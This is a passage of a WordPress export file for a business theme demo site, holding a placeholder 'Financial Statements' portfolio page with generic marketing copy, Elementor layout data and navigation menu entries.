section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Financial Statements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/financial-statements/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=814</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>814</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[financial-statements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[815]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1deb4b19","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"19b383e9","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"500f054","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3071a763","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"828a94c","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"53d504ac","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"4d6cc997","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f023b1","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"177fdce1","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e8ca3c2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7f78bab3","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"409d65b1","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30db82d2","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"40a8f280","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4dfc12a3","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6ec964ab","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"14da4924","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"effadd0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"95b544e","elType":"section","settings":[],"elements":[{"id":"1d94ad6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b0e2267","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"039e9b5","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"89bede7","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3c90616","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"bde2d21","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7912c5f","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"79288d7","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"e326f5c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"95660e1","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2a0f30b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"cba64ae","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"337f75a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"cca8326","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4791b57","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2b322d4","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a549139","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a7c4f85","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"13aca22","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"00abcd6","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"78fc28d","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"df5d7d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"f7e3dca","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"af34d30","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services-1/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/our-services-1/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2126</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>4</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2127/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2127/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2127</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2127]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>15</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
